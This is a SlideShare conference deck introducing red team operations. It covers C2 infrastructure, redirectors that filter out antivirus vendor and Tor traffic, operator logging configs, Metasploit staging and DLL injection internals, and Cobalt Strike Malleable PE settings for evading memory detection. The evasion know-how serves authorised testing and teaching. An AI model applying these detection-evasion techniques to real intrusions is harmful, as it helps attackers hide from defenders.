SlideShare a Scribd company logo
1 of 66
Download to read offline
Introduction to Red Team
Operations
Sunny Neo (@sunn_y_k)
sunny@live.com.sg
#whoami
•Perpetual Information Security Student
•Penetration Tester @ Centurion Information Security
•It was really hard to get here - On and Off Fever
Last Night
Disclaimer
•All views are mine and not the company I work for or any
organisation that I am affiliated with.
•I take NULL credit for all the materials presented here
•I am here just to share the good work from awesome people and
have fun
Shout Out Raphael Mudge (@armitagehacker)
•Awesome resource on Red Team Operations
•Advanced Threat Tactics (2015)
https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-cou
rse-and-notes/
https://www.youtube.com/watch?v=4w7krkqxRck&list=PL9HO6M_MU
2nf8Fa5bVefBW-9bg5Rx94_c
•https://blog.cobaltstrike.com/
Shout Out - Jeff Dimmock (@bluscreenofjeff)
•Awesome materials on Red Team Infrastructure
•https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-
red-team-attack-infrastructure/
•https://speakerdeck.com/bluscreenofjeff/building-a-better-moat-des
igning-an-effective-covert-red-team-attack-infrastructure
•https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Shout Out
•Anyone who shared their experience with me or answer my stupid
questions over Twitter / Slack (BloodHoundGang) / Beer(s)
Objective
•Share my journey on learning about Red Team Operations
•Bridge the gap between Penetration Testers and Red Teamers
Penetration Testing
•Scope Provided
• Limited to No Reconnaissance Required
•No Stealth required
• Scan everything in Scope
• Run tools out of the box (Did you rebuild the tool?)
•Simple to No Infrastructure setup
Red Team Operation
• Test your security investment in a realistic way – objective based
• Depend on the type of operations
• Full Scope Testing (Physical, Social and Cyber)
• Long-Term Operation
• Threat Emulation (Emulating a real-world actor)
Source:
https://blog.cobaltstrike.com/2015/07/09/models-for-red-team-operations/
https://blog.cobaltstrike.com/2016/02/17/the-threat-emulation-problem/
Red Team Operation
•Generally
• Limited Information Provided
• Require Stealth
• Require Appropriate Infrastructure Setup for the operation
Transitional Challenges
•Mindset
•Habits
•Scale
Pen Tester
Red Teamer
Mindset
•Boxed-in by Scope
•Emphasize on Coverage for Systems and Vulnerabilities in Scope
•Does not look for the easiest path to objective
Habits
•Guided by Mindset
•Scan everything in Scope due to emphasis on coverage
•Does not apply adversary’s tradecraft but whatever that gets the job
done
Scale
•No clearly defined scope - How to start?
•Excessive Information - How do you manage information gathered
along the way due to the vague scope?
Principles for Red Team Operations (Mine)
•Protect your Infrastructure
•Log Everything!
•Less is More
•Don’t Get Caught
Protect Your Infrastructure
•Why the need for Infrastructure?
•Why the need to protect your infrastructure?
Protect Your Infrastructure
•Why the need for Infrastructure?
•Why the need to protect your infrastructure?
Typical Penetration Test Infrastructure
Source:
https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastruct
ure/
Services Required for Red Team Operations
•SMTP Server – Phishing
•Web and Database Servers – Phishing and Storing Stolen Credentials
•Payload/Staging Servers – Storing and Sending Payloads
•Multiple Teamservers – C2
Shell Management
•Never do anything from just one shell and one team server
•Always try to persist and expand more shell accesses
•Red team infrastructure design is critical for covert operations
• Short Haul Servers – Initial Access + Post Exploitation Activities
• Long Haul Servers – Low and Slow Callbacks + Session Passing
•https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing
-red-team-operations/
Redirector and Filtering
Source: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
Redirector and Filtering
Source:
https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
Apache Redirector - .htaccess
Source: https://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/
.htaccess Blacklisting
•Jason Lang
(@curi0usJack)
•.htaccess to redirect
• known AV companies IP
address ranges
• TOR Exit Nodes
•https://gist.github.com/c
uri0usJack/971385e8334e
189d93a6cb4671238b10
Automate Your Infrastructure
• Painful to rebuild everything for each engagement
• Automate Infrastructure setup with CoalFire’s Red Baron TerraForm
Examples
• https://rastamouse.me/2017/08/automated-red-team-infrastructure-deploy
ment-with-terraform---part-1/
• https://rastamouse.me/2017/08/automated-red-team-infrastructure-deploy
ment-with-terraform---part-2/
• https://github.com/Coalfire-Research/Red-Baron
Red Baron
Source:
https://github.com/Coalfire-Research/Red-Baron/blob/master/exampl
es/complete_c2.tf
C2 Protocol Considerations
Source:
https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
Command and Control (C2) Security
• Protect your customer’s systems and data
• You don’t want your agents/beacons to be hijacked or confidential data
leaked
• Evaluate the C2 security based on
• Encryption
• Authentication
• Anti Replay Attacks
• https://medium.com/@malcomvetter/responsible-red-teams-1c6209fd43cc
Staged Beacon Process
Staged Payload
Public Key
TeamServer Victim
Meta Data
Session Key
VictimTeamServer
TeamServer Victim
Initial Callback
Encrypted with TeamServer Public Key
Staged Beacon Process
Tasks
TeamServer Victim
Task
Output
VictimTeamServer
Encrypted with Session Key
Encrypted with Session Key
Source: Raphael Mudge - Advanced Threat Tactics (2 of 9): Infrastructure
https://www.youtube.com/watch?v=3gBJOJb8Oi0&feature=youtu.be&t=49m55s
Log Everything!
• Important to have timestamped logs for
• Timeline of Events
• Clean up
• Investigation if anything goes down
• Empire and Cobalt Strike are fine…
• cmd.exe?
• PowerShell?
• bash?
• Metasploit?
• RDP?
Log Everything!
Tool Command
Command Prompt prompt $D$S$T$S$P$G
PowerShell
PowerShell Profile/GPO
Start-Transcript -Path C:psloggingtranscript.txt -NoClobber –IncludeInvocationHeader OR
Computer Configuration – Administrative Templates – Windows Components – Windows PowerShell -“Turn on
PowerShell Transcription”
Bash
~/.bashrc
#Enable Timestamp for Command Line and Use Screen to log session
PS1='D{%F %T} [u@h W] $ ‘
screen -L -Logfile engagementXX.log bash
#Expand History Limits, Enable TimeStamp and Append commands to History for multiple terminal
export HISTSIZE=
export HISTFILESIZE=
export HISTTIMEFORMAT="%d/%m/%y %T "
export HISTCONTROL=ignoredups:erasedups
shopt -s histappend
export PROMPT_COMMAND="history -a; history -c; history -r; $PROMPT_COMMAND"
Msfconsole
~/.msf4/msfconsole.rc
set ConsoleLogging true
set LogLevel 5
set SessionLogging true
set TimestampOutput true
set PromptTimeFormat %Y/%m/%d %H:%M:%S
Less Is More: Information Management
•Don’t just collect information mindlessly
•Use as many scripts as possible to perform data mining
•Have some processes/tools to categorise the information/logs
collected so that it can be easily lookup
•http://www.harmj0y.net/blog/redteaming/push-it-push-it-real-good/
•https://vincentyiu.co.uk/cobaltsplunk/
Don’t Get Caught?
Toolset
TTPsTarget
Target
• Knowing your target
• Knowing what kind of controls they have
• Controls
• Email Filtering Gateway
• Egress Filtering and Authenticated Proxy with Domain Categorization
• IDS/IPS (This Gen, Next Gen, Future Gen)
• Sandbox
• Antivirus (This Gen, Next Gen, Future Gen)
• Endpoint Detection & Response
• Security Operation Center with Analyst looking at alerts
Tactics, Techniques and Procedures (TTPs)
•What is the mode of operation?
• Smash and Grab
• Diversion
• Long-Term Operation
Tactics, Techniques and Procedures (TTPs)
•Tradecraft – Bad Guy’s Best Practices
•Learn from the Bad Guys
• Threat Intelligence Reports
• https://github.com/kbandla/APTnotes
• https://github.com/aptnotes/data
• MITRE ATT&CK Framework
• https://attack.mitre.org/wiki/Main_Page
• https://github.com/redcanaryco/atomic-red-team
Toolset
•Are your tools suitable for the operation?
•Are you able to make operation trade-offs based on your knowledge
of your tools?
• What is the workflow of the tool?
• What artifacts are created?
Metasploit & Meterpreter
•Web Delivery Module with windows/meterpreter/reverse_tcp
Web Delivery Module Process
1. Run the PowerShell One-Liner to download and execute PowerShell
Stager
2. Stager fetches the (encoded) Stage (DLL) and pass control to the
Stage
3. Stage performs (decoding) and Reflective DLL Injection to run the
actual payload
PowerShell Stager on Wire
• Run the PowerShell One-liner to download and execute PowerShell Stager
Stage on Wire
•Stager fetches the (encoded) Stage (DLL) and pass control to the
Stage
EnableStageEncoding Option
•Web Delivery Module with windows/meterpreter/reverse_tcp
•EnableStageEncoding => true
Encoded Stage (DLL)
Memory Artifacts
(Reflective) DLL Injection Overview
Process B Process AAttach
Write DLLPath or
Write DLL ContentProcess B Process A
DLL
Process B Process A
New Memory Section
Allocate
Memory
Execute -
LoadLibrary /
Reflective LoaderProcess B Process A
DLL
Process A
New Thread
Source: http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
Step 2
Step 1
Step 3
Step 4
*For DLL Injection, DLL File has
to be written to disk
Staged Meterpreter Memory Artifact
Payload:
windows/meterpreter/reverse_http
Staged Meterpreter Memory Artifact
Decoded Stage
Staged Meterpreter Memory Artifact
Actual Payload (metsrv.dll) Running
Metasploit Paranoid Mode
•(Generally) Metasploit should not be used for Red Teaming because
most of its payloads can be hijacked and many signatures have been
created for them
•Use Paranoid Mode if need to - Payload UUID Whitelisting and SSL
Certificate Pinning to prevent hijacking
•Use “reverse_winhttps” instead of “reverse_https” to enable SSL
Certificate Pinning for Stager
Cobalt Strike
•Adversary Simulation Tool
•Features
• Team Operation
• Client Side Exploitation
• Asynchronous Post Exploitation
• Covert Communication Flexibility
Cobalt Strike - Default Staged Beacon
Cobalt Strike - Default Stage Memory
Cobalt Strike - Default Beacon Memory
Cobalt Strike - Default String in Stage and
Beacon
Memory Detection Heuristic
• Thread or Memory are not mapped to a file
• Static Image Size
• RWX Page Memory Permission
• Known Strings and PE headers
• William Burgess & Matt Watkins - Advanced Attack Detection
https://www.youtube.com/watch?v=ihElrBBJQo8
• Raphael Mudge – In-memory Evasion (1 of 4) - Detections
https://www.youtube.com/watch?v=lz2ARbZ_5tE
Cobalt Strike – Malleable PE
•https://www.cobaltstrike.com/help-malleable-c2#memory
Cobalt Strike – Malleable PE
• obfuscate: “true” – >=3.11
• Reflective Loader does not initialise any unnecessary PE headers in allocated
memory section for Beacon
• Mask DLL Import Tables
• Obfuscate any known strings for Beacon
• cleanup: “true”
• Free the memory of the Stage
• module_x86 / module_x64
• Module Stomping
• LoadLibrary a DLL that is not loaded and copy Beacon DLL into its memory space
Cobalt Strike – Malleable PE
Demo
Cobalt Strike – Malleable PE
•Additional Modification Options
• prepend – Prepend strings before the
DLL headers
• strrep – replace string found
•Could be used for Threat Emulation
• peclone known malware binaries
• Configure based on known YARA rule
strings for malwares
Cobalt Strike – Best Practices
•Things you could do to make your beacon harder to be detected
• Use Malleable Profile and PE
• Do Session Prepping
• Use “spawnto” to change the default process for Post Exploitation Activities
• Use In-memory .NET Assembly Execution for Post Exploitation activities
• Avoid using Stager
• Avoid using PowerShell
• Avoid Remote Process Injection
Cobalt Strike – Best Practices
•Recommended to Read/Watch
• https://blog.cobaltstrike.com/2018/04/23/fighting-the-toolset
• https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-
eats-its-tail/
• https://blog.cobaltstrike.com/2017/10/25/modern-defenses-and-you/
• https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-
commands/
Other approaches to Detect Beacon
Source: https://twitter.com/jackcr/status/992390807268352001
Question ?
Answer:
Other Reference
• https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac
• https://www.netscylla.com/whitepapers/Crestcon18_Common_Pitfalls_in_Redteaming.pdf
• https://blog.cobaltstrike.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
• https://www.slideshare.net/44Con/44con-meterpreter-internalsv2
• http://buffered.io/posts/staged-vs-stageless-handlers/
• https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/
• https://www.blackhat.com/docs/us-16/materials/us-16-Nipravsky-Certificate-Bypass-Hiding-And-Executing-Malware-From-A-Digitally-Signed-Exec
utable-wp.pdf
• https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
• https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory
• https://ketansingh.net/make-executable-harder-to-recover-from-memory/
• https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Int0X80-Anti-Forensics-AF.pdf
• https://www.veil-framework.com/least-privilege-removing-unnecessary-memory-permissions/
• Michael Hale Ligh, Andrew Case, Jamie Levy, Aaron Walters (2014) - The Art of Memory Forensics: Detecting Malware and Threats in Windows,
Linux and Mac Memory

More Related Content

What's hot

MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringbartblaze
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryJoe Desimone
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active DirectorySunny Neo
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFJorge Orchilles
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKKatie Nickels
 

What's hot (20)

MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineering
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Responding to Cobalt Strike
Responding to Cobalt StrikeResponding to Cobalt Strike
Responding to Cobalt Strike
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturity
 
Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEF
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CKThreat-Based Adversary Emulation with MITRE ATT&CK
Threat-Based Adversary Emulation with MITRE ATT&CK
 

Similar to Introduction to red team operations

Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxAnurag Srivastava
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)ClubHack
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationSatria Ady Pradana
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
Splunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shellsSplunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shellsAnthony D Hendricks
 
Drupal, lessons learnt from real world security incidents
Drupal, lessons learnt from real world security incidentsDrupal, lessons learnt from real world security incidents
Drupal, lessons learnt from real world security incidentssydneydrupal
 
Smart Platform Infrastructure with AWS
Smart Platform Infrastructure with AWSSmart Platform Infrastructure with AWS
Smart Platform Infrastructure with AWSJames Huston
 
The Diabolical Developers Guide to Performance Tuning
The Diabolical Developers Guide to Performance TuningThe Diabolical Developers Guide to Performance Tuning
The Diabolical Developers Guide to Performance TuningjClarity
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
DockerCon Europe 2018 Monitoring & Logging Workshop
DockerCon Europe 2018 Monitoring & Logging WorkshopDockerCon Europe 2018 Monitoring & Logging Workshop
DockerCon Europe 2018 Monitoring & Logging WorkshopBrian Christner
 
Microservices in action at the Dutch National Police - Bert Jan Schrijver - C...
Microservices in action at the Dutch National Police - Bert Jan Schrijver - C...Microservices in action at the Dutch National Police - Bert Jan Schrijver - C...
Microservices in action at the Dutch National Police - Bert Jan Schrijver - C...Codemotion
 
CodeMotion Amsterdam 2018 - Microservices in action at the Dutch National Police
CodeMotion Amsterdam 2018 - Microservices in action at the Dutch National PoliceCodeMotion Amsterdam 2018 - Microservices in action at the Dutch National Police
CodeMotion Amsterdam 2018 - Microservices in action at the Dutch National PoliceBert Jan Schrijver
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
How HashiCorp platform tools can make the difference in development and deplo...
How HashiCorp platform tools can make the difference in development and deplo...How HashiCorp platform tools can make the difference in development and deplo...
How HashiCorp platform tools can make the difference in development and deplo...Dmytro Mykhailov
 
CrikeyCon 2015 - iOS Runtime Hacking Crash Course
CrikeyCon 2015 - iOS Runtime Hacking Crash CourseCrikeyCon 2015 - iOS Runtime Hacking Crash Course
CrikeyCon 2015 - iOS Runtime Hacking Crash Courseeightbit
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Denim Group
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon chinaPeter Hlavaty
 

Similar to Introduction to red team operations (20)

Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
Splunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shellsSplunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shells
 
Drupal, lessons learnt from real world security incidents
Drupal, lessons learnt from real world security incidentsDrupal, lessons learnt from real world security incidents
Drupal, lessons learnt from real world security incidents
 
Smart Platform Infrastructure with AWS
Smart Platform Infrastructure with AWSSmart Platform Infrastructure with AWS
Smart Platform Infrastructure with AWS
 
The Diabolical Developers Guide to Performance Tuning
The Diabolical Developers Guide to Performance TuningThe Diabolical Developers Guide to Performance Tuning
The Diabolical Developers Guide to Performance Tuning
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
DockerCon Europe 2018 Monitoring & Logging Workshop
DockerCon Europe 2018 Monitoring & Logging WorkshopDockerCon Europe 2018 Monitoring & Logging Workshop
DockerCon Europe 2018 Monitoring & Logging Workshop
 
Microservices in action at the Dutch National Police - Bert Jan Schrijver - C...
Microservices in action at the Dutch National Police - Bert Jan Schrijver - C...Microservices in action at the Dutch National Police - Bert Jan Schrijver - C...
Microservices in action at the Dutch National Police - Bert Jan Schrijver - C...
 
CodeMotion Amsterdam 2018 - Microservices in action at the Dutch National Police
CodeMotion Amsterdam 2018 - Microservices in action at the Dutch National PoliceCodeMotion Amsterdam 2018 - Microservices in action at the Dutch National Police
CodeMotion Amsterdam 2018 - Microservices in action at the Dutch National Police
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
How HashiCorp platform tools can make the difference in development and deplo...
How HashiCorp platform tools can make the difference in development and deplo...How HashiCorp platform tools can make the difference in development and deplo...
How HashiCorp platform tools can make the difference in development and deplo...
 
CrikeyCon 2015 - iOS Runtime Hacking Crash Course
CrikeyCon 2015 - iOS Runtime Hacking Crash CourseCrikeyCon 2015 - iOS Runtime Hacking Crash Course
CrikeyCon 2015 - iOS Runtime Hacking Crash Course
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
 

Recently uploaded

DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
